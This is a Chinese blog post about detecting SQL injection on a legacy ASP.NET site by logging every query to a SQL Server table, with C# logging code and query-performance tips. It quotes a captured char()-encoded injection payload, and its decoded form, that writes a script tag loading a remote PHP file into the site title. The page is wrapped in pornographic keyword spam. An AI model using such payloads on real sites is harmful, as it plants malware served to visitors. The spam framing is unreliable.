亚洲综合原千岁中文字幕_国产精品99久久久久久久vr_无码人妻aⅴ一区二区三区浪潮_成人h动漫精品一区二区三

主頁 > 知識庫 > 記一次成功的sql注入入侵檢測附帶sql性能優化

記一次成功的sql注入入侵檢測附帶sql性能優化

熱門標簽:陜西電銷外呼系統好用嗎 蘭州語音外呼系統運營商 銀川高頻外呼回撥系統多少錢 最新人工智能電銷機器人 數字匠心電銷機器人 成都電話外呼系統一般多少錢 沒聽見電話機器人幫你接 al智能電話機器人 如何做地圖標注圖鋪
但是如果是讓你接手一個二等殘廢的網站,并讓你在上面改版,而且不能推翻式改版,只能逐步替換舊的程序,那么你會非常痛苦,例如我遇到的問題:
問題1.
老板對你說,以前剛做完網站好好了,沒有出現木馬,怎么你來了,就會出現木馬,先別說了,趕緊解決問題,我徹底無語,但是如果爭吵,其實證明你和老板一樣無知,拿出證據和事實分析來讓公司其他稍微懂技術的一起來證明,公司網站被掛馬不是你來了的錯。
如是我通過網站目錄仔細排查將通過fck上傳的網馬刪除并修補fck的上傳漏洞并記下了這篇 Fckeditor使用筆記 ,其實很多人都遇到過,也解決過,都是小問題,但是讓你老板明白比解決漏洞問題更蛋疼,我那解釋的叫一個汗啊,恨不得把公司所有稍微懂點技術的都叫上讓他們看什么是大馬什么是小馬,然后演示怎么上傳木馬,奶奶的,黑客教程普及啊。
問題2.
網站又出現問題,上次的問題解決了不過兩個月,網站又被入侵掛馬,如是老板這次再說因為我來了才出問題,立馬走人,這就是為什么不能更不懂技術的人硬碰硬,更不能和你的老板來說,說了你又不懂。
但是要命的是網站是以前的技術開發的二等殘廢,在別個的cms上修改的,我必須保證網站在的開發的同時舊的模塊還可以使用,通過逐步更新的方法將網站底層翻新,但是那么多頁面,你很難一個一個去檢測那個頁面有漏洞,如是寫出下面的檢測代碼,沒想到這么簡單的就搞定了,并且可以通過此方法優化你的sql。
第一步建立一個sql日志表
復制代碼 代碼如下:

CREATE TABLE [dbo].[my_sqllog](
[id] [bigint] IDENTITY(1,1) NOT NULL,
[hit] [bigint] NULL,
[sqltext] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[paramdetails] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[begintime] [datetime] NULL,
[endtime] [datetime] NULL,
[fromurl] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[ip] [varchar](20) COLLATE Chinese_PRC_CI_AS NULL,
[lastelapsedtime] [bigint] NULL,
CONSTRAINT [PK_my_sqllog] PRIMARY KEY CLUSTERED
(
[id] ASC
)WITH (IGNORE_DUP_KEY = OFF) ON [PRIMARY]
) ON [PRIMARY]

記錄sql語句、此sql語句被執行次數,參數及值,記錄開始時間,結束時間,來自哪個頁面,ip和此條語句執行時間(暫時沒用)
第二步在sqlhelper里寫記錄代碼
兩個方法本來可以寫成private的,但是此二等殘廢的網站其他地方用的別的sqlhelper類,就直接調用此處通過合理優化的sqlhelper類的方法了。
代碼1:插入日志
復制代碼 代碼如下:

public static int ExecuteSqlLog(CommandType commandType, string commandText, params DbParameter[] cmdParams)
{
#region 參數處理
string colums = "";
string dbtypes = "";
string values = "";
string paramdetails = "";
if (cmdParams != null cmdParams.Length > 0)
{
foreach (DbParameter param in cmdParams)
{
if (param == null)
{
continue;
}
colums += param.ParameterName + " ";
dbtypes += param.DbType + " ";
values += param.Value + ";";
}
paramdetails = string.Format(" {0},{1},{2}", colums, dbtypes, values);
}
string fromurl = "";
if (System.Web.HttpContext.Current!=null)
{
fromurl = System.Web.HttpContext.Current.Request.Url.ToString();
}
// commandText = commandText.Replace("'","‘").Replace(";",";");
SqlParameter[] parameters = new SqlParameter[]
{
new SqlParameter("@hit",1),
new SqlParameter("@sqltext",commandText),
new SqlParameter("@paramdetails",paramdetails),
new SqlParameter("@begintime",DateTime.Now),
new SqlParameter("@endtime",DateTime.Now),
new SqlParameter("@fromurl",fromurl),
new SqlParameter("@ip",Web.PressRequest.GetIP()),
new SqlParameter("@lastelapsedtime",0),
};
#endregion
using (DbConnection connection = Factory.CreateConnection())
{
connection.ConnectionString = GetRealConnectionString(commandText);//ConnectionString;
string sql = "";
// 執行DbCommand命令,并返回結果.
int id =
Utils.TypeConverter.ObjectToInt(ExecuteScalarLog(CommandType.Text,
"select top 1 id from my_sqllog where sqltext=@sqltext",
new SqlParameter("@sqltext", commandText)));
if (id > 0)
{
sql = "update my_sqllog set hit=hit+1,ip=@ip,endtime=@endtime,fromurl=@fromurl where id=" + id;
}
else
{
sql = "insert into my_sqllog(hit,sqltext,paramdetails,begintime,endtime,fromurl,ip,lastelapsedtime) values(@hit,@sqltext,@paramdetails,@begintime,@endtime,@fromurl,@ip,@lastelapsedtime)";
}
// 創建DbCommand命令,并進行預處理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, sql, parameters, out mustCloseConnection);
// 執行DbCommand命令,并返回結果.
int retval = cmd.ExecuteNonQuery();
// 清除參數,以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}
}

代碼2:判斷此條sql是否存在
復制代碼 代碼如下:

private static object ExecuteScalarLog( CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
if (ConnectionString == null || ConnectionString.Length == 0) throw new ArgumentNullException("ConnectionString");
// 創建并打開數據庫連接對象,操作完成釋放對象.
using (DbConnection connection = Factory.CreateConnection())
{
if (connection == null) throw new ArgumentNullException("connection");
//connection.Close();
connection.ConnectionString = GetRealConnectionString(commandText);
connection.Open();
// 創建DbCommand命令,并進行預處理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
// 執行DbCommand命令,并返回結果.
object retval = cmd.ExecuteScalar();
// 清除參數,以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}
}

第三部在你的每個執行sql語句的方法里加入以下代碼,不管是ExecuteScalar、ExecuteReader還是ExecuteNonQuery等等都加上
復制代碼 代碼如下:

//執行sql之前進行日志記錄操縱
int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);

代碼示例:
復制代碼 代碼如下:

public static object ExecuteScalar(DbConnection connection, CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
if (connection == null) throw new ArgumentNullException("connection");
//connection.Close();
connection.ConnectionString = GetRealConnectionString(commandText);
connection.Open();
// 創建DbCommand命令,并進行預處理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
//執行sql之前進行日志記錄操縱
int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);
// 執行DbCommand命令,并返回結果.
object retval = cmd.ExecuteScalar();
// 清除參數,以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}

然后你會發現入侵的入口被記錄下來了,后面方框里的就是構造注入的sql

構造sql如下:

39191+update+my_websetting+set+websitetitle=REPLACE(cast(websitetitle+as+varchar(8000)),cast(char(60)+char(47)+char(116)+char(105)+char(116)+char(108)+char(101)+char(62)+char(60)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(32)+char(115)+char(114)+char(99)+char(61)+char(104)+char(116)+char(116)+char(112)+char(58)+char(47)+char(47)+char(100)+char(102)+char(114)+char(103)+char(99)+char(99)+char(46)+char(99)+char(111)+char(109)+char(47)+char(117)+char(114)+char(46)+char(112)+char(104)+char(112)+char(62)+char(60)+char(47)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
轉碼后變成這樣了:  

update my_websetting set websitetitle=REPLACE(cast(websitetitle as varchar(8000)),websitetitle+'/title>script src=http://jb51.net/ur.php>/script>')
這個就是木馬地址,沒事你就別點了,好奇害死貓。

小結:
既然知道入口就知道怎么補救了吧,把string類型該過濾的都過濾掉,int類型的就得是int類型,別讓數據庫替你隱式轉。通過此sql日志記錄,你應該發現一點那個hit還是有點價值的。
通過select top 100 * from my_sqllog order by hit desc
你會發現你寫的那么多sql原來真垃圾,在條件允許的情況下干嘛不把它放到緩存里。所以后來我寫的sql基本不在這top 100里。
拋磚引玉,望高手批評,以上入侵方法希望剛學習做程序員的同學不要用來欺負小網站,傷不起。
作者:jqbird

標簽:巴彥淖爾 宜春 鹽城 通化 遼源 邢臺 朔州 本溪

巨人網絡通訊聲明:本文標題《記一次成功的sql注入入侵檢測附帶sql性能優化》,本文關鍵詞  記,一次,成功,的,sql,注入,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《記一次成功的sql注入入侵檢測附帶sql性能優化》相關的同類信息!
  • 本頁收集關于記一次成功的sql注入入侵檢測附帶sql性能優化的相關信息資訊供網民參考!
  • 推薦文章
    亚洲精品影院一区二区| 国产成人精品一区二区视频| 欧美a级成人淫片免费看| 日韩中文字幕一区| 国产伦久视频免费观看 视频| 久草免费在线观看| 精品国产一区二区三区久久久蜜臀| 日本特黄一级| 成人免费观看视频| 欧美激情一区二区三区在线播放 | 美女免费毛片| 尤物视频网站在线| 免费毛片基地| 欧美大片aaaa一级毛片| 99色视频在线| 国产伦精品一区二区三区无广告 | 日韩免费在线| 香蕉视频久久| 一级女性全黄久久生活片| 青青久久精品| 免费一级片在线| 成人a大片在线观看| 精品国产一区二区三区久久久狼| 精品视频在线观看一区二区| 日本久久久久久久 97久久精品一区二区三区 狠狠色噜噜狠狠狠狠97 日日干综合 五月天婷婷在线观看高清 九色福利视频 | 美女免费精品视频在线观看| 欧美激情影院| 可以免费在线看黄的网站| 麻豆污视频| 九九精品久久久久久久久| 午夜激情视频在线播放| 久久久久久久网| 91麻豆精品国产高清在线| 国产一区二区精品尤物| 久久精品成人一区二区三区| 国产91精品露脸国语对白| 午夜家庭影院| 99色视频| 欧美激情一区二区三区在线| 美女免费毛片| 免费毛片基地| 欧美一级视频免费观看| 日本特黄一级| 日本免费区| 九九九网站| 国产网站免费| 日韩免费片| 中文字幕97| 国产一区二区精品| 国产麻豆精品高清在线播放| 精品视频在线看| 国产成人精品综合| 久久精品大片| 国产网站免费观看| 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 色综合久久天天综合观看| 国产一区二区精品久久| 国产精品1024在线永久免费 | 国产精品自拍一区| 欧美国产日韩一区二区三区| 天天做日日爱| 色综合久久天天综线观看| 成人影院久久久久久影院| 人人干人人插| a级毛片免费全部播放| 久久99这里只有精品国产| 国产精品1024永久免费视频| 成人免费高清视频| 四虎影视久久久免费| 国产成人精品综合久久久| 91麻豆精品国产自产在线观看一区 | 一级毛片视频免费| 亚洲第一页色| 日本久久久久久久 97久久精品一区二区三区 狠狠色噜噜狠狠狠狠97 日日干综合 五月天婷婷在线观看高清 九色福利视频 | 精品国产一区二区三区国产馆| 九九免费高清在线观看视频| 亚洲精品影院| 韩国三级香港三级日本三级| 久草免费在线视频| 精品国产一区二区三区国产馆| 九九干| 欧美另类videosbestsex视频 | 四虎影视久久久免费| 久草免费资源| 可以免费在线看黄的网站| 一本高清在线| 999精品影视在线观看| 亚洲www美色| 人人干人人插| 日本特黄一级| 成人免费福利片在线观看| 成人a大片在线观看| 精品国产一区二区三区免费| 久草免费在线视频| 精品国产一级毛片| 精品久久久久久影院免费| 天天做日日爱| 久久成人性色生活片| 国产成人精品综合| 国产精品1024永久免费视频| 国产伦精品一区二区三区在线观看 | 国产欧美精品| 亚欧乱色一区二区三区| 人人干人人插| 国产一区二区精品久久91| 99久久视频| 午夜在线观看视频免费 成人| 成人免费观看视频| 国产视频网站在线观看| 成人免费观看视频| 99久久精品国产高清一区二区| 九九九在线视频| 91麻豆tv| 日韩avdvd| 久久99这里只有精品国产| 精品视频在线观看免费 | 九九精品久久久久久久久| 青青久热| 色综合久久久久综合体桃花网| 日韩免费片| 99久久精品费精品国产一区二区| 精品视频一区二区| 日本久久久久久久 97久久精品一区二区三区 狠狠色噜噜狠狠狠狠97 日日干综合 五月天婷婷在线观看高清 九色福利视频 | 亚洲精品影院久久久久久| 你懂的在线观看视频| 精品在线免费播放| 精品久久久久久免费影院| 国产国语对白一级毛片| 一级女人毛片人一女人| 精品国产亚洲人成在线| 一级片片| 久久国产精品自由自在| 成人a大片在线观看| 天天做人人爱夜夜爽2020毛片| 你懂的福利视频| 欧美激情一区二区三区在线播放 | 精品国产一区二区三区久久久蜜臀| 国产91丝袜高跟系列| 麻豆污视频| 可以在线看黄的网站| 国产视频一区二区在线播放| 好男人天堂网 久久精品国产这里是免费 国产精品成人一区二区 男人天堂网2021 男人的天堂在线观看 丁香六月综合激情 | 日本伦理片网站| 国产麻豆精品| 国产麻豆精品视频| 久久精品免视看国产明星 | 高清一级片| 亚洲女人国产香蕉久久精品| 天天做日日爱夜夜爽| 日韩免费在线视频| 国产原创中文字幕| 青青久久精品| 九九国产| 亚洲第一色在线| 精品毛片视频| 成人免费网站视频ww| 日本免费看视频| 99色视频在线| 黄色免费三级| 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 欧美18性精品| 美国一区二区三区| 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 999精品影视在线观看| 成人影视在线播放| 日韩在线观看免费| 国产国产人免费视频成69堂| 国产高清在线精品一区a| 香蕉视频久久| 亚飞与亚基在线观看| 久久精品免视看国产明星| 精品国产亚洲人成在线| 麻豆午夜视频| 一级片免费在线观看视频| 亚飞与亚基在线观看| 欧美电影免费看大全| 日本在线播放一区| 欧美大片aaaa一级毛片| 久久精品道一区二区三区| 一级片免费在线观看视频| 久久国产精品永久免费网站| 国产伦精品一区二区三区无广告| 日本在线www| 国产亚洲精品aaa大片| 国产不卡在线观看| 国产一区二区精品久久91| 国产一区二区精品久久| 国产网站免费观看| 青青青草视频在线观看| 国产网站免费| 欧美夜夜骑 青草视频在线观看完整版 久久精品99无色码中文字幕 欧美日韩一区二区在线观看视频 欧美中文字幕在线视频 www.99精品 香蕉视频久久 | 精品国产香蕉伊思人在线又爽又黄| 精品视频一区二区| 欧美18性精品| 91麻豆精品国产片在线观看| 欧美激情一区二区三区在线播放| 精品国产亚洲人成在线| 99久久网站| 精品视频免费观看| 麻豆污视频|